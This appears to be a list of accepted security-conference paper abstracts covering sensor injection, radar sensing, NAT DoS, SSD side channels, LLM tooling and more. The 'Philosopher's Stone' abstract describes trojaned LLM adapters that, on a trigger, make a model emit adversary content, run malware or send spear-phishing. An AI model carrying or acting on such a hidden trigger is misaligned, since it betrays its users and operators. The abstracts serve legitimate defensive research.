Topics: Mobile and wireless network security; Security and privacy of mobile/smartphone platforms and their operating systems; Security and privacy of systems based on machine learning, federated learning, AI, and large language models; Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems); Security for emerging networks (e.g., smart homes, IoT, body-area networks, VANETs) and Software/firmware/hardware security analysis, customization, and extensions


PowerRadio: Manipulate Sensor Measurement via Power GND Radiation
Yan Jiang, Xiaoyu Ji, Yancheng Jiang, Kai Wang (Zhejiang University); Chenren Xu (Peking University); Wenyuan Xu (Zhejiang University)

Abstract: Sensors are key components to enable various applications, e.g., home intrusion detection, and environment monitoring. While various software defenses and physical protections are used to prevent sensor manipulation, this paper introduces a new threat vector, PowerRadio, which can bypass existing protections and change the sensor readings at a distance. PowerRadio leverages interconnected ground (GND) wires, a standard practice for electrical safety at home, to inject malicious signals. The injected signal is coupled by the sensor’s analog measurement wire and eventually, it survives the noise filters, inducing incorrect measurement. We present three methods that can manipulate sensors by inducing static bias, periodical signals, or pulses. For instance, we show adding stripes into the captured images of a surveillance camera or injecting inaudible voice commands into conference microphones. We study the underlying principles of PowerRadio and find its root causes: (1) the lack of shielding between ground and data signal wires and (2) the asymmetry of circuit impedance that enables interference to bypass filtering. We validate PowerRadio against a surveillance system, broadcast system, and various sensors. We believe that PowerRadio represents an emerging threat that exhibits the pros of both radiated and conducted EMI, e.g., expanding the effective attack distance of radiated EMI yet eliminating the requirement of line-of-sight or approaching physically. Our insights shall provide guidance for enhancing the sensors’ security and power wiring during the design phases.

Topics: Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems) and Security for large-scale, critical infrastructures (e.g., electronic voting, smart grid)


RACONTEUR: A Knowledgeable, Insightful, and Portable LLM-Powered Shell Command Explainer
Jiangyi Deng, Xinfeng Li, Yanjiao Chen, Yijie Bai (Zhejiang University); Haiqin Weng, Yan Liu, Tao Wei (Ant Group); Wenyuan Xu (Zhejiang University)

Abstract: Malicious shell commands are linchpins to many cyber-attacks, but may not be easy to understand by security analysts due to complicated and often disguised code structures. Advances in large language models (LLMs) have unlocked the possibility of generating understandable explanations for shell commands. However, existing general-purpose LLMs suffer from a lack of expert knowledge and a tendency to hallucinate in the task of shell command explanation. In this paper, we present Raconteur, a knowledgeable, expressive and portable shell command explainer powered by LLM. Raconteur is infused with professional knowledge to provide comprehensive explanations on shell commands, including not only what the command does (i.e., behavior) but also why the command does it (i.e., purpose). To shed light on the high-level intent of the command, we also translate the natural-language-based explanation into standard technique & tactic defined by MITRE ATT&CK, the worldwide knowledge base of cybersecurity. To enable Raconteur to explain unseen private commands, we further develop a documentation retriever to obtain relevant information from complementary documentations to assist the explanation process. We have created a large-scale dataset for training and conducted extensive experiments to evaluate the capability of Raconteur in shell command explanation. The experiments verify that Raconteur is able to provide high-quality explanations and in-depth insight of the intent of the command.

Topic: Usable security and privacy


RadSee: See Your Handwriting Through Walls Using FMCW Radar
Shichen Zhang, Qijun Wang, Maolin Gan, Zhichao Cao, Huacheng Zeng (Michigan State University)

Abstract: This paper aims to design and implement a radio device capable of detecting a person’s handwriting through a wall. Although there is extensive research on radio frequency (RF) based human activity recognition, this task is particularly challenging due to the \textit{through-wall} requirement and the \textit{tiny-scale} handwriting movements. To address these challenges, we present RadSee—a 6 GHz frequency modulated continuous wave (FMCW) radar system designed for detecting handwriting content behind a wall. RadSee is realized through a joint hardware and software design. On the hardware side, RadSee features a 6 GHz FMCW radar device equipped with two custom-designed, high-gain patch antennas. These two antennas provide a sufficient link power budget, allowing RadSee to “see” through most walls with a small transmission power. On the software side, RadSee extracts effective phase features corresponding to the writer’s hand movements and employs a bidirectional LSTM (BiLSTM) model with an attention mechanism to classify handwriting letters. As a result, RadSee can detect millimeter-level handwriting movements and recognize most letters based on their unique phase patterns. Additionally, it is resilient to interference from other moving objects and in-band radio devices. We have built a prototype of RadSee and evaluated its performance in various scenarios. Extensive experimental results demonstrate that RadSee achieves 75% letter recognition accuracy when victims write 62 random letters, and 87% word recognition accuracy when they write articles.

Topic: Mobile and wireless network security


ReDAN: An Empirical Study on Remote DoS Attacks against NAT Networks
Xuewei Feng, Yuxiang Yang, Qi Li (Tsinghua University); Xingxiang Zhan (Zhongguancun Lab); Kun Sun (George Mason University); Ziqiang Wang, Ao Wang (Southeast University); Ganqiu Du (China Software Testing Center); Ke Xu (Tsinghua University)

Abstract: In this paper, we conduct an empirical study on remote DoS attacks targeting NAT networks (ReDAN, short for Remote DoS Attacks targeting NAT). We show that Internet attackers operating outside local NAT networks possess the capability to remotely identify a NAT device and subsequently terminate TCP connections initiated from the identified NAT device to external servers. Our attack involves two steps. First, we identify NAT devices on the Internet by exploiting inadequacies in the Path MTU Discovery (PMTUD) mechanism within NAT specifications. This deficiency creates a fundamental side channel that allows Internet attackers to distinguish if a public IPv4 address serves a NAT device or a separate IP host, aiding in the identification of target NAT devices. Second, we launch a remote DoS attack to terminate TCP connections on the identified NAT devices. While recent NAT implementations may include protective measures, such as packet legitimacy validation to prevent malicious manipulations on NAT mappings, we discover that these safeguards are not widely adopted in real world. Consequently, attackers can send crafted packets to deceive NAT devices into erroneously removing innocent TCP connection mappings, thereby disrupting the NATed clients to access remote TCP servers. Our experimental results reveal widespread security vulnerabilities in existing NAT devices. After testing 8 types of router firmware and 30 commercial NAT devices from 14 vendors, we identify vulnerabilities in 6 firmware types and 29 NAT devices that allow off-path removal of TCP connection mappings. Moreover, our measurements reveal a stark reality: 166 out of 180 (over 92%) tested real-world NAT networks, comprising 90 4G LTE/5G networks, 60 public Wi-Fi networks, and 30 cloud VPS networks, are susceptible to exploitation. We responsibly disclosed the vulnerabilities to affected vendors and received a significant number of acknowledgments. Finally, we propose our countermeasures against the identified DoS attack.

Topics: Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response and Network security policy implementation, deployment, and management


Reinforcement Unlearning
Dayong Ye (University of Technology Sydney); Tianqing Zhu, Congcong Zhu (City University of Macau); Derui Wang (CSIRO’s Data61); Kun Gao (University of Technology Sydney); Zewei Shi (CSIRO’s Data61); Sheng Shen (Torrens University Australia); Wanlei Zhou (City University of Macau); Minhui Xue (CSIRO’s Data61)

Abstract: Machine unlearning refers to the process of mitigating the influence of specific training data on machine learning models based on removal requests from data owners. However, one important area that has been largely overlooked in the research of unlearning is reinforcement learning. Reinforcement learning focuses on training an agent to make optimal decisions within an environment to maximize its cumulative rewards. During the training, the agent tends to memorize the features of the environment, which raises a significant concern about privacy. As per data protection regulations, the owner of the environment holds the right to revoke access to the agent’s training data, thus necessitating the development of a novel and pressing research field, termed \emph{reinforcement unlearning}. Reinforcement unlearning focuses on revoking entire environments rather than individual data samples. This unique characteristic presents three distinct challenges: 1) how to propose unlearning schemes for environments; 2) how to avoid degrading the agent’s performance in remaining environments; and 3) how to evaluate the effectiveness of unlearning. To tackle these challenges, we propose two reinforcement unlearning methods. The first method is based on decremental reinforcement learning, which aims to erase the agent’s previously acquired knowledge gradually. The second method leverages environment poisoning attacks, which encourage the agent to learn new, albeit incorrect, knowledge to remove the unlearning environment. Particularly, to tackle the third challenge, we introduce the concept of “environment inference” to evaluate the unlearning outcomes. The source code is available at \url{https://github.com/cp-lab-uts/Reinforcement-Unlearning}.

Topics: Privacy and anonymity in networks and distributed systems; Security and privacy of mobile/smartphone platforms and their operating systems and Security and privacy of systems based on machine learning, federated learning, AI, and large language models


ReThink: Reveal the Threat of Electromagnetic Interference on Power Inverters
Fengchen Yang, Zihao Dan, Kaikai Pan, Chen Yan, Xiaoyu Ji, Wenyuan Xu (Zhejiang University; ZJU QI-ANXIN IoT Security Joint Labratory)

Abstract: With the boom of renewable energy sources (RES), the number of power inverters proliferates. Power inverters are the key electronic devices that transform the direct current (DC) power from RES to the alternating current (AC) power on the grids, and their security can affect the stable operation of RES and even power grids. This paper analyzes the security of photovoltaic (PV) inverters from the aspects of internal sensors since they serve as the foundation for safe power conversion. We discover that both the embedded current sensors and voltage sensors are vulnerable to electromagnetic interference (EMI) of 1 GHz or higher, despite electromagnetic compatibility (EMC) countermeasures. Such vulnerabilities can lead to incorrect measurements and deceiving the control algorithms, and we design ReThink that could produce three types of consequences on PV inverters by emitting carefully crafted EMI, i.e., Denial of Service (DoS), damaging inverters physically or damping the power output. We successfully validate these consequences on 5 off-the-shelf PV inverters, and even in a real-world microgrid, by transmitting EMI signals at a distance of $100 \sim 150 \mathrm{cm}$ and a total power within $20 \, \mathrm{W}$. Our work aims to raise awareness of the security of power electronic devices of RES, as they represent an emerging Cyber-Physical attack surface to the future RES-dominated grid. Finally, to cope with such threats, we provide hardware and software-based countermeasures.

Topics: Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems); Security for large-scale, critical infrastructures (e.g., electronic voting, smart grid) and Software/firmware/hardware security analysis, customization, and extensions


Revisiting EM-based Estimation for Locally Differentially Private Protocols
Yutong Ye (Institute of software, Chinese Academy of Sciences & Zhongguancun Laboratory, Beijing, PR.China.); Tianhao Wang (University of Virginia); Min Zhang, Dengguo Feng (Institute of Software, Chinese Academy of Sciences)

Abstract: This paper investigates the fundamental estimation problem in local differential privacy (LDP). We categorize existing estimation methods into two approaches, the unbiased estimation approach, which, under LDP, often gives unreasonable results (negative results or the sum of estimation does not equal to the total number of participating users), due to the excessive amount of noise added in LDP, and the maximal likelihood estimation (MLE)-based approach, which, can give reasonable results, but often suffers from the overfitting issue. To address this challenge, we propose a reduction framework inspired by Gaussian mixture models (GMM). We adapt the reduction framework to LDP estimation by transferring the estimation problem to the density estimation problem of the mixture model. Through the merging operation of the smallest weight component in this mixture model, the EM algorithm converges faster and produces a more robust distribution estimation. We show this framework offers a general and efficient way of modeling various LDP protocols. Through extensive evaluations, we demonstrate the superiority of our approach in terms of mean estimation, categorical distribution estimation, and numerical distribution estimation.

Topic: Privacy and anonymity in networks and distributed systems


Revisiting Physical-World Adversarial Attack on Traffic Sign Recognition: A Commercial Systems Perspective
Ningfei Wang, Shaoyuan Xie, Takami Sato, Yunpeng Luo (University of California, Irvine); Kaidi Xu (Drexel University); Qi Alfred Chen (University of California, Irvine)

Abstract: Traffic Sign Recognition (TSR) is crucial for safe and correct driving automation. Recent works revealed a general vulnerability of TSR models to physical-world adversarial attacks, which can be low-cost, highly deployable, and capable of causing severe attack effects such as hiding a critical traffic sign or spoofing a fake one. However, so far existing works generally only considered evaluating the attack effects on academic TSR models, leaving the impacts of such attacks on real-world commercial TSR systems largely unclear. In this paper, we conduct the first large-scale measurement of physical-world adversarial attacks against commercial TSR systems. Our testing results reveal that it is possible for existing attack works from academia to have highly reliable (100%) attack success against certain commercial TSR system functionality, but such attack capabilities are not generalizable, leading to much lower-than-expected attack success rates overall. We find that one potential major factor is a spatial memorization design that commonly exists in today’s commercial TSR systems. We design new attack success metrics that can mathematically model the impacts of such design on the TSR system-level attack success, and use them to revisit existing attacks. Through these efforts, we uncover 7 novel observations, some of which directly challenge the observations or claims in prior works due to the introduction of the new metrics.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Security for cyber-physical systems (e.g., autonomous vehicles, industrial control systems)


Rondo: Scalable and Reconfiguration-Friendly Randomness Beacon
Xuanji Meng (Tsinghua University); Xiao Sui (Shandong University); Zhaoxin Yang (Tsinghua University); Kang Rong, Wenbo Xu, Shenglong Chen, Ying Yan (Blockchain Platform Division, Ant Group); Sisi Duan (Tsinghua University)

Abstract: We present Rondo, a scalable and reconfiguration-friendly distributed randomness beacon (DRB) protocol in the partially synchronous model. Rondo is the first DRB protocol that is built from batched asynchronous verifiable secret sharing (bAVSS) and meanwhile avoids the high $O(n^3)$ message cost, where $n$ is the number of nodes. Our key contribution lies in the introduction of a new variant of bAVSS called batched asynchronous verifiable secret sharing with partial output (bAVSS-PO). bAVSS-PO is a weaker primitive than bAVSS but allows us to build a secure and more scalable DRB protocol. We propose a bAVSS-PO protocol Breeze. Breeze achieves the optimal $O(n)$ messages for the sharing stage and allows Rondo to offer better scalability than prior DRB protocols. Additionally, to support the reconfiguration, we introduce Rondo-BFT, a dynamic and partially synchronous Byzantine fault-tolerant protocol inspired by Dyno (S&P 2022). Unlike Dyno, Rondo-BFT provides a communication pattern that generates randomness beacon output periodically, making it well-suited for DRB applications.

We implement our protocols and evaluate the performance on Amazon EC2 using up to 91 instances. Our evaluation results show that Rondo achieves higher throughput than existing works and meanwhile offers better scalability, where the performance does not degrade as significantly as $n$ grows.

Topic: Security and privacy for blockchains and cryptocurrencies


SCRUTINIZER: Towards Secure Forensics on Compromised TrustZone
Yiming Zhang (Southern University of Science and Technology and The Hong Kong Polytechnic University); Fengwei Zhang (Southern University of Science and Technology); Xiapu Luo (The Hong Kong Polytechnic University); Rui Hou (Institute of Information Engineering, Chinese Academy of Sciences); Xuhua Ding (Singapore Management University); Zhenkai Liang (National University of Singapore); Shoumeng Yan, Tao Wei, Zhengyu He (Ant Group)

Abstract: The number of vulnerabilities exploited in Arm TrustZone systems has been increasing recently. The absence of digital forensics tools prevents platform owners from incident response or periodic security scans. However, the area of secure forensics for compromised TrustZone remains unexplored and presents unresolved challenges. Traditional out-of-TrustZone forensics are inherently hindered by TrustZone protection, rendering them infeasible. In-TrustZone approaches are susceptible to attacks from privileged adversaries, undermining their security.

To fill these gaps, we introduce SCRUTINIZER, the first secure forensics solution for compromised TrustZone systems. SCRUTINIZER utilizes the highest privilege domain of the recent Arm Confidential Computing Architecture (CCA), called the Root world, and extends it to build a protected SCRUTINIZER Monitor. Our design proposes a protective layer in the Monitor that decouples the memory acquisition functionality from the Monitor and integrates it into an in-TrustZone agent. This ensures that the agent is isolated from TrustZone systems and helps to minimize the codebase expansion of the Root world. Furthermore, by grafting most of the target’s page tables in the agent, SCRUTINIZER reduces redundant translation and mapping operations during memory acquisition, ultimately reducing performance overhead. SCRUTINIZER leverages multiple standard hardware features to enable secure forensic capabilities beyond pure memory acquisition, such as memory access traps and instruction tracing, while making them impervious to hardware configuration tampering by the privileged adversary. We prototype SCRUTINIZER and evaluate it using extensive experiments. The results show that SCRUTINIZER effectively inspects TrustZone systems while immune against privileged adversaries.

Topics: Cyber-crime defense and forensics (e.g., anti-phishing, anti-blackmailing, anti-fraud techniques) and Trustworthy computing software and hardware to secure networks and systems


Secret Spilling Drive: Leaking User Behavior through SSD Contention
Jonas Juffinger, Fabian Rauscher (Graz University of Technology); Giuseppe La Manna (Amazon); Daniel Gruss (Graz University of Technology)

Abstract: Covert channels and side channels bypass architectural security boundaries. Numerous works have studied covert channels and side channels in software and hardware. Thus, research on covert-channel and side-channel mitigations relies on the discovery of leaky hardware and software components.

In this paper, we perform the first study of timing channels inside modern commodity off-the-shelf SSDs. We systematically analyze the behavior of NVMe PCIe SSDs with concurrent workloads. We observe that exceeding the maximum I/O operations of the SSD leads to significant latency spikes. We narrow down the number of I/O operations required to still induce latency spikes on 12 different SSDs. Our results show that a victim process needs to read at least 8 to 128 blocks to be still detectable by an attacker. Based on these experiments, we show that an attacker can build a covert channel, where the sender encodes secret bits into read accesses to unrelated blocks, inaccessible to the receiver. We demonstrate that this covert channel works across different systems and different SSDs, even from processes running inside a virtual machine. Our unprivileged SSD covert channel achieves a true capacity of up to 1503 bit/s while it works across virtual machines (cross-VM) and is agnostic to operating system versions, as well as other hardware characteristics such as CPU or DRAM. Given the coarse granularity of the SSD timing channel, we evaluate it as a side channel in an open-world website fingerprinting attack over the top 100 websites. We achieve an F1 score of up to 97.0. This shows that the leakage goes beyond covert communication and can leak highly sensitive information from victim users. Finally, we discuss the root cause of the SSD timing channel and how it can be mitigated.

Topics: Security for cloud/edge computing and Software/firmware/hardware security analysis, customization, and extensions


Secure IP Address Allocation at Cloud Scale
Eric Pauley, Kyle Domico, Blaine Hoak, Ryan Sheatsley, Quinn Burke, Yohan Beugin (University of Wisconsin–Madison); Engin Kirda (Northeastern University); Patrick McDaniel (University of Wisconsin–Madison)

Abstract: Public clouds necessitate dynamic resource allocation and sharing. However, the dynamic allocation of IP addresses can be abused by adversaries to source malicious traffic, bypass rate limiting systems, and even capture traffic intended for other cloud tenants. As a result, both the cloud provider and their customers are put at risk, and defending against these threats requires a rigorous analysis of tenant behavior, adversarial strategies, and cloud provider policies. In this paper, we develop a practical defense for IP address allocation through such an analysis. We first develop a statistical model of cloud tenant deployment behavior based on literature and measurement of deployed systems. Through this, we analyze IP allocation policies under existing and novel threat models. In response to our stronger proposed threat model, we design IP scan segmentation, an IP allocation policy that protects the address pool against adversarial scanning even when an adversary is not limited by number of cloud tenants. Through empirical evaluation on both synthetic and real-world allocation traces, we show that IP scan segmentation reduces adversaries’ ability to rapidly allocate addresses, protecting both address space reputation and cloud tenant data. In this way, we show that principled analysis and implementation of cloud IP address allocation can lead to substantial security gains for tenants and their users.

Topic: Security for cloud/edge computing


Secure Transformer Inference Made Non-interactive
Jiawen Zhang, Xinpeng Yang (Zhejiang University); Lipeng He (University of Waterloo); Kejia Chen, Wen-jie Lu, Yinghao Wang, Xiaoyang Hou, Jian Liu, Kui Ren, Xiaohu Yang (Zhejiang University)

Abstract: Secure transformer inference has emerged as a prominent research topic following the proliferation of ChatGPT. Existing solutions are typically interactive, involving substantial communication load and numerous interaction rounds between the client and the server.

In this paper, we propose NEXUS, the first non-interactive protocol for secure transformer inference. The protocol requires the client to engage in just one round of communication with the server during the whole inference process: submitting an encrypted input and receiving an encrypted result. NEXUS introduces several novel primitives, including SIMD ciphertext compression/decompression, SIMD slot folding, and secure Argmax, which enable it to significantly surpass the state-of-the-art in communication while maintaining comparable runtime. Specifically, it reduces bandwidth consumption by 372.5$\times$ compared to BOLT (Oakland~’24) and 53.6$\times$ compared to Bumblebee (NDSS~’25). Furthermore, its non-interactive property allows for optimal hardware acceleration, with the GPU version achieving a 42.3$\times$ speedup in runtime. This enables NEXUS to run inference on a BERT-based model in just 37.3 seconds, consuming only 164~MB of bandwidth.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Silence False Alarms: Identifying Anti-Reentrancy Patterns on Ethereum to Refine Smart Contract Reentrancy Detection
Qiyang Song (Institute of Information Engineering, Chinese Academy of Sciences; School of Cyber Security, University of Chinese Academy of Sciences); Heqing Huang (Institute of Information Engineering, Chinese Academy of Sciences); Xiaoqi Jia, Yuanbo Xie (Institute of Information Engineering, Chinese Academy of Sciences; School of Cyber Security, University of Chinese Academy of Sciences); Jiahao Cao (Institute for Network Sciences and Cyberspace, Tsinghua University)

Abstract: Reentrancy vulnerabilities in Ethereum smart contracts have caused significant financial losses, prompting the creation of several automated reentrancy detectors. However, these detectors frequently yield a high rate of false positives due to coarse detection rules, often misclassifying contracts protected by anti-reentrancy patterns as vulnerable. Thus, there is a critical need for the development of specialized automated tools to assist these detectors in accurately identifying anti-reentrancy patterns. While existing code analysis techniques show promise for this specific task, they still face significant challenges in recognizing anti-reentrancy patterns. These challenges are primarily due to the complex and varied features of anti-reentrancy patterns, compounded by insufficient prior knowledge about these features.

This paper introduces AutoAR, an automated recognition system designed to explore and identify prevalent anti-reentrancy patterns in Ethereum contracts. AutoAR utilizes a specialized graph representation, RentPDG, combined with a data filtration approach, to effectively capture anti-reentrancy-related semantics from a large pool of contracts. Based on RentPDGs extracted from these contracts, AutoAR employs a recognition model that integrates a graph auto-encoder with a clustering technique, specifically tailored for precise anti-reentrancy pattern identification. Experimental results show AutoAR can assist existing detectors in identifying 12 prevalent anti-reentrancy patterns with 89% accuracy, and when integrated into the detection workflow, it significantly reduces false positives by over 85%.

Topics: Anti-malware techniques: detection, analysis, and prevention; Security and privacy for blockchains and cryptocurrencies and Security for large-scale, critical infrastructures (e.g., electronic voting, smart grid)


The (Un)usual Suspects – Studying Reasons for Lacking Updates in WordPress
Maria Hellenthal, Lena Gotsche, Rafael Mrowczynski (CISPA Helmholtz Center for Information Security); Sarah Kugel (Saarland University); Michael Schilling, Ben Stock (CISPA Helmholtz Center for Information Security)

Abstract: The widespread use of Content Management Systems (CMS) like WordPress has made these systems attractive targets for adversaries, with the vulnerabilities in the code posing serious risks. Despite being the most effective way to reduce these risks, more than half of all CMS installations lack the latest security patches. Researchers have tried to notify website operators about vulnerabilities using vulnerability notifications, which often exhibit limited impact. In this paper, we use the Grounded Theory approach to investigate the reasons why website owners do not update their CMS. To gain a holistic view on lacking update behavior, we interviewed website owners with outdated WordPress-based systems as well as individuals involved in website creation and hosting. On the one hand, we could confirm issues known from other ecosystems, such as lack of risk awareness, perceived risks of updates, and update costs, as factors for lacking CMS updates. More importantly, our study identified factors that have not been explicitly addressed in the general updating behaviour and vulnerability notification literature: (1) the subjective value of a website to its owner and (2) the delegation of website operations, which influence updating behavior far more decisively. Furthermore, we showed that website owners perceive a potential compromise of their CMS only as a risk to themselves and not as a threat to the wider online community. These findings that we present as four non-update scenarios may partly explain the limited success of previous efforts to notify operators about vulnerabilities in their systems. Our study not only offers valuable insights for future research, testing the effectiveness of vulnerability notifications and studying updating behavior in general, but it also proposes practical suggestions on how to reduce the number of outdated systems on the web.

Topic: Usable security and privacy


The Midas Touch: Triggering the Capability of LLMs for RM-API Misuse Detection
Yi Yang, Jinghua Liu, Kai Chen, Miaoqian Lin (Institute of Information Engineering, Chinese Academy of Sciences, Beijing, China; School of Cyber Security, University of Chinese Academy of Sciences, China)

Abstract: As the basis of software resource management (RM), strictly following the RM-API constraints guarantees secure resource management and software. To enhance the RM-API application, researchers find it effective in detecting RM-API misuse on open-source software according to RM-API constraints retrieved from documentation and code. However, the current pattern-matching constraint retrieval methods have limitations: the documentation-based methods leave many API constraints irregularly distributed or involving neutral sentiment undiscovered; the code-based methods result in many false bugs due to incorrect API usage since not all high-frequency usages are correct. Therefore, people propose to utilize Large Language Models (LLMs) for RM-API constraint retrieval with their potential on text analysis and generation. However, directly using LLMs has limitations due to the hallucinations. The LLMs fabricate answers without expertise leaving many RM APIs undiscovered and generating incorrect answers even with evidence introducing incorrect RM-API constraints and false bugs.

In this paper, we propose an LLM-empowered RM-API misuse detection solution, \textit{ChatDetector}, which fully automates LLMs for documentation understanding which helps RM-API constraints retrieval and RM-API misuse detection. To correctly retrieve the RM-API constraints, \textit{ChatDetector} is inspired by the ReAct framework which is optimized based on Chain-of-Thought (CoT) to decompose the complex task into allocation APIs identification, RM-object (allocated/released by RM APIs) extraction and RM-APIs pairing (RM APIs usually exist in pairs). It first verifies the semantics of allocation APIs based on the retrieved RM sentences from API documentation through LLMs. Inspired by the LLMs’ performance on various prompting methods, \textit{ChatDetector} adopts a two-dimensional prompting approach for cross-validation. At the same time, an inconsistency-checking approach between the LLMs’ output and the reasoning process is adopted for the allocation APIs confirmation with an off-the-shelf Natural Language Processing (NLP) tool. To accurately pair the RM-APIs, \textit{ChatDetector} decomposes the task again and identifies the RM-object type first, with which it can then accurately pair the releasing APIs and further construct the RM-API constraints for misuse detection. With the diminished hallucinations, \textit{ChatDetector} identifies 165 pairs of RM-APIs with a precision of 98.21% compared with the state-of-the-art API detectors. By employing a static detector CodeQL, we ethically report 115 security bugs on the applications integrating on six popular libraries to the developers, which may result in severe issues, such as Denial-of-Services (DoS) and memory corruption. Compared with the end-to-end benchmark method, the result shows that \textit{ChatDetector} can retrieve at least 47% more RM sentences and 80.85% more RM-API constraints. Since no work exists specified in utilizing LLMs for RM-API misuse detection to our best knowledge, the inspiring results show that LLMs can assist in generating more constraints beyond expertise and can be used for bug detection. It also indicates that future research could transfer from overcoming the bottlenecks of traditional NLP tools to creatively utilizing LLMs for security research.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Software/firmware/hardware security analysis, customization, and extensions


The Philosopher’s Stone: Trojaning Plugins of Large Language Models
Tian Dong (Shanghai Jiao Tong University, China); Minhui Xue (CSIRO’s Data61, Australia); Guoxing Chen (Shanghai Jiao Tong University, China); Rayne Holland (CSIRO’s Data61, Australia); Yan Meng (Shanghai Jiao Tong University, China); Shaofeng Li (Southeast University, China); Zhen Liu, Haojin Zhu (Shanghai Jiao Tong University, China)

Abstract: Open-source Large Language Models (LLMs) have recently gained popularity because of their comparable performance to proprietary LLMs. To efficiently fulfill domain-specialized tasks, open-source LLMs can be refined, without expensive accelerators, using low-rank adapters. However, it is still unknown whether low-rank adapters can be exploited to control LLMs. To address this gap, we demonstrate that an infected adapter can induce, on specific triggers, an LLM to output content defined by an adversary and to even maliciously use tools. To train a Trojan adapter, we propose two novel attacks, POLISHED and FUSION, that improve over prior approaches. POLISHED uses a superior LLM to align naïvely poisoned data based on our insight that it can better inject poisoning knowledge during training. In contrast, FUSION leverages a novel over-poisoning procedure to transform a benign adapter into a malicious one by magnifying the attention between trigger and target in model weights. In our experiments, we first conduct two case studies to demonstrate that a compromised LLM agent can use malware to control the system (e.g., a LLM-driven robot) or to launch a spear-phishing attack. Then, in terms of targeted misinformation, we show that our attacks provide higher attack effectiveness than the existing baseline and, for the purpose of attracting downloads, preserve or improve the adapter’s utility. Finally, we designed and evaluated three potential defenses. However, none proved entirely effective in safeguarding against our attacks, highlighting the need for more robust defenses supporting a secure LLM supply chain.

Topics: Cyber-crime defense and forensics (e.g., anti-phishing, anti-blackmailing, anti-fraud techniques); Security and privacy of systems based on machine learning, federated learning, AI, and large language models; Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy and Usable security and privacy


The Power of Words: A Comprehensive Analysis of Rationales and Their Effects on Users’ Permission Decisions
Yusra Elbitar (CISPA Helmholtz Center for Information Security and Saarland University); Alexander Hart, Sven Bugiel (CISPA Helmholtz Center for Information Security)

Abstract: Rationales offer a method for app developers to convey their permission needs to users. While guidelines and recommendations exist on how to request permissions, developers have the creative freedom to design and phrase these rationales. In this work, we explore the characteristics of real-world rationales and how their building blocks affect users’ permission decisions and their evaluation of those decisions. Through an analysis of 720 sentences and 428 screenshots of rationales from the top apps of Google Play, we identify the various phrasing and design elements of rationales. Subsequently, in a user study involving 960 participants, we explore how different combinations of phrasings impact users’ permission decision-making process. By aligning our insights with established recommendations, we offer actionable guidelines for developers, aiming to make rationales a usable security instrument for users.

Topics: Security and privacy of mobile/smartphone platforms and their operating systems and Usable security and privacy


The Skeleton Keys: A Large Scale Analysis of Credential Leakage in Mini-apps
Yizhe Shi, Zhemin Yang, Kangwei Zhong, Guangliang Yang, Yifan Yang, Xiaohan Zhang, Min Yang (Fudan University)

Abstract: In recent years, the app-in-app paradigm, involving super-app and mini-app, has been becoming increasingly popular in the mobile ecosystem. Super-app platforms offer mini-app servers access to a suite of powerful and sensitive services, including payment processing and mini-app analytics. This access empowers mini-app servers to enhance their offerings with robust and practical functionalities and better serve their mini-apps. To safeguard these essential services, a credential-based authentication system has been implemented, facilitating secure access between super-app platforms and mini-app servers. However, the design and workflow of the crucial credential mechanism still remain unclear. More importantly, its security has not been comprehensively understood or explored to date.

In this paper, we conduct the first systematic study of the credential system in the app-in-app paradigm and draw the security landscape of credential leakage risks. Consequently, our study shows that 21 popular super-app platforms delegate sensitive services to mini-app servers with seven types of credentials. Unfortunately, these credentials may suffer from leakage threats caused by malicious mini-app users, posing serious security threats to both super-app platforms and mini-app servers. Then, we design and implement a novel credential security verification tool, called KeyMagnet, that can effectively assess the security implications of credential leakage. To tackle unstructured and dynamically retrieved credentials in the app-in-app paradigm, KeyMagnet extracts and understands the semantics of credential-use in mini-apps and verifies their security. Last, by applying KeyMagnet on 413,775 real-world mini-apps of 6 super-app platforms, 84,491 credential leaks are detected, spanning over 54,728 mini-apps. We confirm credential leakage can cause serious security hazards, such as hijacking the accounts of all mini-app users and stealing users’ sensitive data. In response, we have engaged in responsible vulnerability disclosure with the corresponding developers and are actively helping them resolve these issues. At the time of writing, 89 reported issues have been assigned with CVE IDs.

Topics: Security and privacy of mobile/smartphone platforms and their operating systems and Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


THEMIS: Regulating Textual Inversion for Personalized Concept Censorship
Yutong Wu (Nanyang Technological University); Jie Zhang (Centre for Frontier AI Research, Agency for Science, Technology and Research (A*STAR), Singapore); Florian Kerschbaum (University of Waterloo); Tianwei Zhang (Nanyang Technological University)

Abstract: Personalization has become a crucial demand in the Generative AI technology. As the pre-trained generative model (*e.g.*, stable diffusion) has fixed and limited capability, it is desirable for users to customize the model to generate output with new or specific concepts. Fine-tuning the pre-trained model is not a promising solution, due to its high requirements of computation resources and data. Instead, the emerging personalization approaches make it feasible to augment the generative model in a lightweight manner. However, this also induces severe threats if such advanced techniques are misused by malicious users, such as spreading fake news or defaming individual reputations. Thus, it is necessary to regulate personalization models (*i.e.*, achieve *concept censorship*) for their development and advancement.

In this paper, we focus on the regulation of a popular personalization technique dubbed \textbf{Textual Inversion (TI)}, which can customize Text-to-Image (T2I) generative models with excellent performance. TI crafts the word embedding that contains detailed information about a specific object. Users can easily add the word embedding to their local T2I model, like the public Stable Diffusion (SD) model, to generate personalized images. The advent of TI has brought about a new business model, evidenced by the public platforms for sharing and selling word embeddings (*e.g.*, Civitai [1]). Unfortunately, such platforms also allow malicious users to misuse the word embeddings to generate unsafe content, causing damages to the concept owners.

We propose *THEMIS* to achieve the ***personalized concept censorship***. Its key idea is to leverage the backdoor technique for good by injecting positive backdoors into the TI embeddings. Briefly, the concept owner selects some sensitive words as triggers during the training of TI, which will be censored for normal use. In the subsequent generation stage, if a malicious user combines the sensitive words with the personalized embeddings as final prompts, the T2I model will output a pre-defined target image rather than images including the desired malicious content. To demonstrate the effectiveness of *THEMIS*, we conduct extensive experiments on the TI embeddings with Latent Diffusion and Stable Diffusion, two prevailing open-sourced T2I models. The results demonstrate that *THEMIS* is capable of preventing Textual Inversion from cooperating with sensitive words meanwhile guaranteeing its pristine utility. Furthermore, *THEMIS* is general to different uses of sensitive words, including different locations, synonyms, and combinations of sensitive words. It can also resist different types of potential and adaptive attacks. Ablation studies are also conducted to verify our design.

